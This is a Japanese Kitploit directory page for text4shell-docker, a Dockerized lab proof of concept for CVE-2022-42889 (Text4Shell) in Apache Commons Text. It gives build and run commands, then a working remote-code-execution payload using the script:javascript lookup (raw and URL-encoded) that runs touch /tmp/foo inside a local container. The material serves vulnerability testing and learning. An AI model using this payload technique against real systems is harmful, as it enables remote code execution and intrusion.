Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
text4shell-docker — CVE-2022-42889 Text4Shell 向け Docker 化 PoC | Kitploit
ツール/GitHubGitHub/aaronm-sysdig/text4shell-docker
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubaaronm-sysdig/text4shell-docker

text4shell-docker

CVE-2022-42889 Text4Shell 向け Docker 化 PoC

リポジトリを見る
212年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Install maven - maven-linux


  1. Maven インストール (fat jar を作成するため)
root@kitploit:~
mvn clean install
  1. Docker ビルド
root@kitploit:~
docker build --tag=text4shell .
  1. Docker 実行
root@kitploit:~
docker run -p 80:8080 text4shell
  1. アプリをテスト
root@kitploit:~
http://localhost/text4shell/attack?search=<anything>
  1. 攻撃は、「${prefix:name}」という文字列を渡すことで実行できます。ここで prefix は前述のルックアップです:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D

  1. dns または url プレフィックスも試せます。

  2. コンテナ ID を取得

root@kitploit:~
docker container ls
  1. アプリに入る
root@kitploit:~
docker exec -it <container_id> bash
  1. 上記の RCE が成功したか確認するには(/tmp ディレクトリに foo というファイルが作成されているはずです):
root@kitploit:~
ls /tmp/
  1. コンテナを停止する
root@kitploit:~
docker container stop <container_id>
ツールをダウンロード